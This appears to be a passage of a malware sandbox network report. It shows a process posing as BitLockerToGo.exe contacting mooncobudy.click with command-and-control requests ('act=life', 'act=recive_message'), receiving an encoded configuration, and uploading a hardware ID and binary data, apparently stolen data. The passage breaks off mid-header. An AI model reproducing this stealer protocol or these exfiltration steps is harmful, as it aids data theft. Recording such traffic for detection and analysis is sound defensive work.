Dec 24, 2024 02:56:49.785202026 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:49.785507917 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:49.785522938 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.052803040 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.052896976 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.054141998 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.054157019 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.054380894 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.064331055 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065076113 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065109015 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.065232038 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065262079 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.065392017 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065427065 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.065572977 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065597057 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.065773010 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.065802097 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.065989971 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.066025972 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.066035032 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.066050053 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.066231012 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.066252947 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.066281080 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.066433907 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.066462994 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.107330084 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.107526064 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.107544899 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.107568026 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.107588053 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:56:51.107620955 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:56:51.107636929 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.030649900 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.030761957 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.030816078 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:57:01.030917883 CET	49742	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:57:01.030936956 CET	443	49742	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.039874077 CET	49749	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:57:01.039911032 CET	443	49749	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.039980888 CET	49749	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:57:01.040329933 CET	49749	443	192.168.2.4	104.21.44.57
Dec 24, 2024 02:57:01.040342093 CET	443	49749	104.21.44.57	192.168.2.4
Dec 24, 2024 02:57:01.995878935 CET	49749	443	192.168.2.4	104.21.44.57

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 02:56:34.022145987 CET	60799	53	192.168.2.4	1.1.1.1
Dec 24, 2024 02:56:34.346987009 CET	53	60799	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 02:56:34.022145987 CET	192.168.2.4	1.1.1.1	0xf0b9	Standard query (0)	mooncobudy.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 02:56:34.346987009 CET	1.1.1.1	192.168.2.4	0xf0b9	No error (0)	mooncobudy.click		104.21.44.57	A (IP address)	IN (0x0001)	false
Dec 24, 2024 02:56:34.346987009 CET	1.1.1.1	192.168.2.4	0xf0b9	No error (0)	mooncobudy.click		172.67.195.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mooncobudy.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:35 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mooncobudy.click
2024-12-24 01:56:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 01:56:36 UTC	1122	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l9dkk5oto55om8jneqldq2ec9l; expires=Fri, 18 Apr 2025 19:43:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jh%2BEOT%2Fqpvcy9HM2811HzJxuXlwaKX%2FLlfFxzdPbDouSItwQMPqbSYwXOd5qdDVIj9hHnzVcqL1148wAxOKaHIOfOYmZRo8tipY3sHk9f8s4PqVQVgX6QU1PZ7KzJY8g575e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cf9cd18f5c351-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1568&rtt_var=589&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1856325&cwnd=184&unsent_bytes=0&cid=94dd16b90c08eb3c&ts=1046&x=0"
2024-12-24 01:56:36 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 01:56:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:37 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 48 Host: mooncobudy.click
2024-12-24 01:56:37 UTC	48	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=Jwquln--2112YT&j=
2024-12-24 01:56:38 UTC	1122	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n4rc3c1f36v26caq72p3d5pmah; expires=Fri, 18 Apr 2025 19:43:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPdLEr%2Fwatmfi4LtzFbWydBEdbvk%2F2MqbTXBemdbh4RyVQM7oUSIiyR32HOVEe65zVTeH3OSCzldmA7ueH819M2tGorraXggfJFZsShzjk43ZR5RG%2BPN3Z9lIOBmulc1Czm8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cf9da3d7178d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1926&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=948&delivery_rate=1516095&cwnd=210&unsent_bytes=0&cid=e8ad17240d3b0d06&ts=1047&x=0"
2024-12-24 01:56:38 UTC	247	IN	Data Raw: 34 39 31 63 0d 0a 7a 33 41 67 31 34 36 69 2f 4a 57 66 52 71 32 68 75 6f 6c 63 6d 5a 74 2f 46 62 2f 73 56 56 50 43 6e 48 68 46 32 75 56 55 33 52 79 30 55 6c 62 31 74 4a 62 51 74 2b 77 6a 6a 35 76 4f 2b 79 6e 38 74 31 31 30 32 38 35 76 4e 61 50 77 43 79 44 32 78 79 4b 77 50 76 55 57 51 62 76 39 78 39 43 33 2b 6a 36 50 6d 2b 48 79 66 76 7a 31 58 53 2b 64 69 54 38 78 6f 2f 41 61 4a 4c 47 4b 4a 4c 46 2f 70 78 78 48 76 2b 76 42 6d 50 54 7a 4b 38 6a 45 33 2b 67 32 39 2f 49 53 66 64 4c 4f 65 58 47 6e 35 6c 70 2f 2b 4b 67 78 71 58 32 43 45 56 4f 38 72 4e 2f 51 37 72 30 6a 77 34 4f 41 71 7a 33 38 2b 52 4e 7a 32 34 63 39 4f 36 72 34 47 79 47 77 6c 54 32 37 64 4b 63 53 52 4c 37 68 79 49 7a 35 2b 53 7a 44 77 74 58 6f 66 72 57 35 47 6d 2b 64 31 Data Ascii: 491cz3Ag146i/JWfRq2huolcmZt/Fb/sVVPCnHhF2uVU3Ry0Ulb1tJbQt+wjj5vO+yn8t110285vNaPwCyD2xyKwPvUWQbv9x9C3+j6Pm+Hyfvz1XS+diT8xo/AaJLGKJLF/pxxHv+vBmPTzK8jE3+g29/ISfdLOeXGn5lp/+KgxqX2CEVO8rN/Q7r0jw4OAqz38+RNz24c9O6r4GyGwlT27dKcSRL7hyIz5+SzDwtXofrW5Gm+d1
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 6e 64 69 6b 76 30 4c 4e 71 32 4b 4a 72 6b 2b 73 6c 78 62 39 65 76 4d 33 71 2b 39 4c 4d 50 4e 33 65 67 78 2f 50 67 64 5a 64 4b 4f 4e 44 6d 6f 2b 68 41 6f 74 34 67 34 74 58 6d 6c 47 30 57 36 36 38 69 59 2b 50 35 6b 67 59 50 66 38 33 36 6a 75 54 31 6e 33 6f 30 6a 50 4c 47 2b 42 57 6d 68 78 7a 47 7a 50 76 56 53 52 4c 76 74 7a 5a 37 6c 39 53 2f 45 78 73 72 67 4e 2f 62 30 48 58 72 58 67 54 51 78 70 2f 51 51 4b 4c 4b 44 4f 37 4a 34 72 52 49 43 2b 36 7a 48 68 72 65 6c 5a 4f 7a 47 79 4f 77 79 37 62 73 6e 4e 38 4c 41 4c 6e 47 6e 38 6c 70 2f 2b 49 38 7a 76 48 32 6d 48 55 47 39 35 39 4b 65 35 66 73 70 79 74 48 65 37 6a 44 78 2b 67 39 39 30 34 67 30 4f 4b 76 33 48 79 43 38 78 33 6a 2f 65 62 56 53 47 76 58 4e 7a 5a 58 37 39 7a 50 50 67 38 65 6c 4a 37 76 2b 45 54 65 46 Data Ascii: ndikv0LNq2KJrk+slxb9evM3q+9LMPN3egx/PgdZdKONDmo+hAot4g4tXmlG0W668iY+P5kgYPf836juT1n3o0jPLG+BWmhxzGzPvVSRLvtzZ7l9S/ExsrgN/b0HXrXgTQxp/QQKLKDO7J4rRIC+6zHhrelZOzGyOwy7bsnN8LALnGn8lp/+I8zvH2mHUG959Ke5fspytHe7jDx+g9904g0OKv3HyC8x3j/ebVSGvXNzZX79zPPg8elJ7v+ETeF
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 79 2b 56 47 65 2f 6e 33 62 6e 50 6f 63 52 56 72 62 6d 67 71 76 30 38 79 72 49 31 5a 6a 30 63 4f 4b 35 47 6e 75 64 31 6e 63 38 6f 66 59 63 4e 62 65 4b 4e 62 46 77 6f 68 64 4e 76 65 7a 41 6b 2f 4c 35 4c 38 54 41 31 65 38 73 38 66 6b 56 63 74 79 45 50 58 48 75 76 68 30 2f 2b 4e 39 32 6a 6d 6d 6d 55 48 65 32 34 73 36 5a 34 62 30 37 67 64 71 59 37 44 4b 37 6f 56 31 36 31 59 73 79 50 71 48 30 46 43 4b 79 69 7a 36 78 66 62 38 64 52 72 58 67 79 4a 54 36 38 79 44 48 79 74 50 67 4f 50 76 34 46 7a 65 54 7a 6a 41 70 34 4b 5a 61 45 37 2b 4c 4f 37 41 38 6d 42 46 4d 75 2b 76 57 33 75 69 7a 50 59 2f 45 31 4b 74 6d 75 2f 55 55 64 39 61 45 4d 7a 47 6e 38 78 38 6b 76 34 51 37 75 48 53 6a 46 55 61 35 35 63 32 59 39 2f 6f 67 79 74 48 64 34 6a 4c 33 75 56 4d 33 32 70 5a 33 61 Data Ascii: y+VGe/n3bnPocRVrbmgqv08yrI1Zj0cOK5Gnud1nc8ofYcNbeKNbFwohdNvezAk/L5L8TA1e8s8fkVctyEPXHuvh0/+N92jmmmUHe24s6Z4b07gdqY7DK7oV161YsyPqH0FCKyiz6xfb8dRrXgyJT68yDHytPgOPv4FzeTzjAp4KZaE7+LO7A8mBFMu+vW3uizPY/E1Ktmu/UUd9aEMzGn8x8kv4Q7uHSjFUa55c2Y9/ogytHd4jL3uVM32pZ3a
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 72 2b 4e 39 32 74 6e 65 2f 48 45 79 38 34 63 61 57 38 50 4d 70 78 4d 58 54 37 44 6e 39 39 42 56 36 32 49 30 32 4e 61 72 73 47 53 79 79 69 6a 7a 2f 4d 4f 30 56 57 76 57 30 67 4c 6e 37 31 44 54 55 30 63 36 72 49 62 58 67 58 58 44 52 7a 6d 39 78 6f 2f 45 54 4b 4c 43 50 4f 62 42 36 6f 78 52 45 75 4f 6e 50 6c 4f 58 31 4b 73 4c 49 31 2b 41 73 2b 2f 51 5a 65 39 6d 47 50 44 76 67 73 46 6f 67 6f 4d 64 75 2f 30 75 67 48 55 4b 32 2b 6f 43 42 75 65 52 6b 79 4d 2b 59 73 33 37 33 39 78 31 34 30 59 49 38 4f 61 48 79 46 43 43 39 6a 6a 36 33 62 4b 77 57 53 72 54 69 7a 35 2f 7a 2b 43 48 4c 78 4e 7a 74 4d 62 75 33 58 58 44 46 7a 6d 39 78 6a 39 6b 76 5a 5a 6d 39 64 71 41 77 74 46 4a 46 75 61 79 59 33 76 76 2b 4b 4d 66 4d 33 75 49 79 38 66 41 57 65 39 61 4b 4f 7a 69 6c 2b 42 Data Ascii: r+N92tne/HEy84caW8PMpxMXT7Dn99BV62I02NarsGSyyijz/MO0VWvW0gLn71DTU0c6rIbXgXXDRzm9xo/ETKLCPObB6oxREuOnPlOX1KsLI1+As+/QZe9mGPDvgsFogoMdu/0ugHUK2+oCBueRkyM+Ys3739x140YI8OaHyFCC9jj63bKwWSrTiz5/z+CHLxNztMbu3XXDFzm9xj9kvZZm9dqAwtFJFuayY3vv+KMfM3uIy8fAWe9aKOzil+B
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 4a 4c 68 33 76 78 78 50 75 75 54 49 6c 2f 62 35 49 63 4c 46 31 4f 45 2f 2f 50 63 54 66 35 33 41 64 7a 61 34 76 6b 4a 6e 6d 5a 63 74 72 57 69 67 4d 30 2b 36 72 4e 2f 51 37 72 30 6a 77 34 4f 41 71 7a 66 70 2f 52 42 6c 31 49 6b 35 50 71 50 73 47 79 71 7a 6c 54 47 77 65 71 6f 65 52 4c 72 71 77 5a 76 39 38 53 50 4b 79 4e 66 6e 66 72 57 35 47 6d 2b 64 31 6e 63 66 71 2b 30 4e 4a 4c 61 4d 49 4b 51 2b 73 6c 78 62 39 65 76 4d 33 71 2b 39 4a 38 54 49 33 4f 73 79 2b 2f 30 51 64 38 2b 42 4d 44 61 70 39 51 67 74 76 34 41 39 74 33 57 69 46 46 43 35 34 74 4b 62 35 65 39 6b 67 59 50 66 38 33 36 6a 75 53 74 77 7a 5a 34 30 63 35 48 6f 47 54 47 7a 69 6a 72 2f 59 65 4d 4c 41 72 4c 67 67 4d 61 33 2b 79 76 47 77 4e 66 71 4e 2f 66 30 47 48 37 59 6a 7a 45 31 71 76 51 61 49 62 36 Data Ascii: JLh3vxxPuuTIl/b5IcLF1OE//PcTf53Adza4vkJnmZctrWigM0+6rN/Q7r0jw4OAqzfp/RBl1Ik5PqPsGyqzlTGweqoeRLrqwZv98SPKyNfnfrW5Gm+d1ncfq+0NJLaMIKQ+slxb9evM3q+9J8TI3Osy+/0Qd8+BMDap9Qgtv4A9t3WiFFC54tKb5e9kgYPf836juStwzZ40c5HoGTGzijr/YeMLArLggMa3+yvGwNfqN/f0GH7YjzE1qvQaIb6
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 2b 30 56 54 76 57 30 67 4a 33 77 2f 69 58 46 79 74 54 6b 4f 66 2f 72 46 33 44 50 6a 7a 59 36 72 66 49 61 4b 72 57 4e 4e 37 5a 7a 6f 52 39 46 73 75 50 46 33 72 6d 39 49 39 65 44 67 4b 73 66 39 76 49 52 4c 49 66 4f 4b 48 2b 35 76 68 30 72 2b 4e 39 32 76 33 53 6f 47 45 2b 32 34 38 4f 4d 39 76 73 32 7a 38 37 53 2b 54 54 77 2f 42 42 36 30 49 30 78 4e 36 76 79 43 43 36 34 68 44 33 2f 4d 4f 30 56 57 76 57 30 67 4c 33 67 36 79 37 49 7a 38 37 67 50 2f 6a 76 45 47 65 64 77 48 63 67 70 2b 39 61 66 36 36 58 49 62 68 68 34 77 73 43 73 75 43 41 78 72 66 37 4c 63 6e 45 33 75 55 73 2f 76 38 53 65 4e 53 48 4d 7a 6d 6a 2f 68 34 6a 76 34 49 31 73 33 57 71 45 55 32 78 35 63 36 58 2b 4c 31 71 6a 38 54 41 71 32 61 37 32 41 5a 30 30 59 4e 33 4c 75 37 6e 57 69 43 30 78 32 37 2f Data Ascii: +0VTvW0gJ3w/iXFytTkOf/rF3DPjzY6rfIaKrWNN7ZzoR9FsuPF3rm9I9eDgKsf9vIRLIfOKH+5vh0r+N92v3SoGE+248OM9vs2z87S+TTw/BB60I0xN6vyCC64hD3/MO0VWvW0gL3g6y7Iz87gP/jvEGedwHcgp+9af66XIbhh4wsCsuCAxrf7LcnE3uUs/v8SeNSHMzmj/h4jv4I1s3WqEU2x5c6X+L1qj8TAq2a72AZ00YN3Lu7nWiC0x27/
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 4b 2b 2b 73 57 5a 34 62 38 52 7a 4d 33 57 37 43 69 37 35 69 49 35 6e 59 45 74 63 66 6a 48 41 32 65 2f 69 33 62 6e 50 72 67 56 51 72 4c 32 31 70 6e 37 37 43 2f 43 7a 2f 72 6b 4f 65 33 36 45 6e 54 4d 68 33 73 36 72 62 35 55 5a 37 2b 66 64 75 63 2b 67 68 56 55 74 73 50 44 6a 2f 36 39 61 6f 2f 45 7a 71 74 6d 75 38 64 64 5a 64 36 65 4e 44 36 78 77 46 70 2f 6f 62 6c 32 74 47 69 71 41 6b 47 6a 35 38 32 53 35 73 4e 6b 6c 35 65 4b 75 57 79 70 71 77 49 33 77 72 46 35 63 61 47 2b 51 68 36 68 78 79 44 2f 4a 76 39 63 41 71 65 73 6d 4e 36 77 2f 6a 62 64 78 64 76 39 50 62 7a 48 49 31 44 4c 68 44 41 68 70 2b 6b 56 5a 2f 62 48 4f 66 38 6d 6c 46 4a 4c 73 76 66 52 69 50 72 74 49 34 2f 38 6c 71 73 6d 75 36 46 64 51 74 36 41 4f 54 61 32 37 31 63 41 72 6f 30 78 72 33 6d 36 48 Data Ascii: K++sWZ4b8RzM3W7Ci75iI5nYEtcfjHA2e/i3bnPrgVQrL21pn77C/Cz/rkOe36EnTMh3s6rb5UZ7+fduc+ghVUtsPDj/69ao/Ezqtmu8ddZd6eND6xwFp/obl2tGiqAkGj582S5sNkl5eKuWypqwI3wrF5caG+Qh6hxyD/Jv9cAqesmN6w/jbdxdv9PbzHI1DLhDAhp+kVZ/bHOf8mlFJLsvfRiPrtI4/8lqsmu6FdQt6AOTa271cAro0xr3m6H
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 4f 6c 66 66 36 4e 4e 6e 59 6c 4f 4d 39 34 65 4d 6a 53 66 61 43 4d 54 61 36 2b 52 77 42 6d 4d 64 34 2f 33 48 74 53 6e 76 31 70 49 43 68 75 62 30 38 6a 35 75 59 33 6a 33 31 39 78 70 68 7a 4d 4d 66 45 70 72 45 57 41 75 2f 6b 6e 53 4c 65 62 30 44 53 62 6a 67 67 4e 43 33 2b 32 53 58 6b 35 61 72 4f 75 71 35 52 53 65 50 31 57 4a 69 39 36 35 49 4f 50 61 65 64 71 6b 2b 39 55 41 4d 39 66 36 41 78 72 65 36 4a 39 33 52 33 75 67 6f 2b 4c 34 6a 53 66 71 41 4d 44 43 32 37 67 30 6f 68 72 6b 6a 76 48 43 6a 46 56 53 6b 72 49 37 65 2b 4c 31 38 39 6f 4f 51 71 77 47 31 75 51 55 33 68 63 34 43 4d 71 37 77 48 54 47 70 79 68 47 78 65 61 77 45 55 71 4c 6a 67 4e 43 33 2b 32 53 58 6b 5a 61 72 4f 75 71 35 52 53 65 50 31 57 4a 69 39 36 35 49 4f 50 61 65 64 71 6b 2b 39 55 41 4d 39 66 Data Ascii: Olff6NNnYlOM94eMjSfaCMTa6+RwBmMd4/3HtSnv1pIChub08j5uY3j319xphzMMfEprEWAu/knSLeb0DSbjggNC3+2SXk5arOuq5RSeP1WJi965IOPaedqk+9UAM9f6Axre6J93R3ugo+L4jSfqAMDC27g0ohrkjvHCjFVSkrI7e+L189oOQqwG1uQU3hc4CMq7wHTGpyhGxeawEUqLjgNC3+2SXkZarOuq5RSeP1WJi965IOPaedqk+9UAM9f
2024-12-24 01:56:38 UTC	1369	IN	Data Raw: 2b 6a 4c 4d 67 35 61 72 4d 72 75 68 58 58 62 58 6e 6a 6f 2b 70 37 49 64 50 62 2f 48 65 50 39 77 37 55 6f 43 74 4f 62 51 6b 2f 6a 36 61 4d 6e 4e 31 71 73 68 74 65 42 64 59 5a 33 57 5a 48 2f 67 37 46 70 2f 2b 4d 41 31 72 57 79 72 45 56 53 32 71 2f 36 67 32 75 38 6a 33 38 43 61 32 6a 50 2f 37 77 68 30 7a 59 6b 4a 44 34 33 73 48 54 65 37 78 51 65 70 66 61 30 63 52 66 57 69 67 49 61 33 70 57 54 69 30 64 2f 37 50 62 75 33 58 58 75 64 31 6e 63 38 73 76 6b 4b 4a 50 53 41 4c 4c 67 2b 73 6c 78 62 39 66 71 41 78 71 53 7a 5a 4e 32 44 67 4b 74 35 39 66 51 63 64 4e 4f 4e 4a 53 4f 6d 2f 51 77 6b 2f 37 6b 49 6b 6d 79 71 41 6b 48 33 33 63 32 61 34 65 67 6e 33 38 54 6d 31 52 50 70 2f 67 31 30 6e 36 49 77 50 4b 7a 41 4a 42 43 70 67 43 62 39 57 4b 34 45 51 66 57 69 67 49 61 Data Ascii: +jLMg5arMruhXXbXnjo+p7IdPb/HeP9w7UoCtObQk/j6aMnN1qshteBdYZ3WZH/g7Fp/+MA1rWyrEVS2q/6g2u8j38Ca2jP/7wh0zYkJD43sHTe7xQepfa0cRfWigIa3pWTi0d/7Pbu3XXud1nc8svkKJPSALLg+slxb9fqAxqSzZN2DgKt59fQcdNONJSOm/Qwk/7kIkmyqAkH33c2a4egn38Tm1RPp/g10n6IwPKzAJBCpgCb9WK4EQfWigIa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:40 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=DGI840PD1ZFG7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18134 Host: mooncobudy.click
2024-12-24 01:56:40 UTC	15331	OUT	Data Raw: 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a 46 47 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 44 47 49 38 34 30 50 44 31 5a Data Ascii: --DGI840PD1ZFG7Content-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--DGI840PD1ZFG7Content-Disposition: form-data; name="pid"2--DGI840PD1ZFG7Content-Disposition: form-data; name="lid"Jwquln--2112YT--DGI840PD1Z
2024-12-24 01:56:40 UTC	2803	OUT	Data Raw: cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2024-12-24 01:56:41 UTC	1120	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2l9i3nhb52tggf8o2an8brcf40; expires=Fri, 18 Apr 2025 19:43:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHMpmEBje7tcbm761nHzMxM48Ck9FEfbMvKVbx6rVfaOXEpCweL4QdjYQMC69rz95rlN8sD3lvC2HelLLsRj58T1d9bpaKKslfm3BsBehlRGdCzsdL08KqLLJT3CgaVrZx3q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cf9e9ed9f7c6f-EWR alt-svc: h3=":443"; 